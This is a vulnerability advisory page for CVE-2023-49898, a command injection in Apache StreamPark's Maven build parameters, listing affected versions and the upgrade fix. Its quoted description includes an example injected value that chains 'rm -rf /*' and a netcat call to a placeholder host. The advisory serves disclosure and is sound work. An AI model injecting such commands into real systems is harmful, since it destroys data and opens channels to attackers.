CVE-2023-49898— Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

EPSS 1.90% · P83 Updated Jan 25, 2025

Get alerts for future matching vulnerabilitiesLog in to subscribe

I. Basic Information for CVE-2023-49898

Vulnerability Information

Have questions about the vulnerability? See if Shenlong's analysis helps!

Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.

Vulnerability Title

Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

Source: NVD (National Vulnerability Database)

Vulnerability Description

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Source: NVD (National Vulnerability Database)

CVSS Information

N/A

Source: NVD (National Vulnerability Database)

Vulnerability Type

在命令中使用的特殊元素转义处理不恰当(命令注入)

Source: NVD (National Vulnerability Database)

Vulnerability Title

Apache StreamPark 命令注入漏洞

Source: CNNVD (China National Vulnerability Database)

Vulnerability Description

Apache StreamPark是美国阿帕奇（Apache）基金会的一个流媒体应用程序开发框架。 Apache StreamPark 2.0.0版本至2.1.2之前版本存在命令注入漏洞，该漏洞源于没有对编译参数进行检查，允许攻击者插入命令进行远程命令执行。

Source: CNNVD (China National Vulnerability Database)

CVSS Information

N/A

Source: CNNVD (China National Vulnerability Database)

Vulnerability Type

N/A

Source: CNNVD (China National Vulnerability Database)

Affected Products

Vendor	Product	Affected Versions	CPE	Subscribe
Apache Software Foundation	Apache StreamPark (incubating)	2.0.0 ~ 2.1.2	-

II. Public POCs for CVE-2023-49898

#	POC Description	Source Link	Shenlong Link

AI-Generated POCPremium

No public POC found.

III. Intelligence Information for CVE-2023-49898

请登录查看更多情报信息。

Same Patch Batch · Apache Software Foundation · 2023-12-15 · 4 CVEs total

CVE-2023-30867		Apache StreamPark (incubating): Authenticated system users could trigger SQL injection vul
CVE-2023-46279		Apache Dubbo: Bypass deny serialize list check in Apache Dubbo
CVE-2023-29234		Bypass serialize checks in Apache Dubbo

IV. Related Vulnerabilities

Same product: Apache StreamPark (incubating)

Same vendor: Apache Software Foundation

Same weakness: CWE-77

V. Comments for CVE-2023-49898

No comments yet

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2023-49898— Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

I. Basic Information for CVE-2023-49898

Vulnerability Information

Vulnerability Title

Vulnerability Description

CVSS Information

Vulnerability Type

Vulnerability Title

Vulnerability Description

CVSS Information

Vulnerability Type

Affected Products

II. Public POCs for CVE-2023-49898

III. Intelligence Information for CVE-2023-49898

Same Patch Batch · Apache Software Foundation · 2023-12-15 · 4 CVEs total

IV. Related Vulnerabilities

V. Comments for CVE-2023-49898

Leave a comment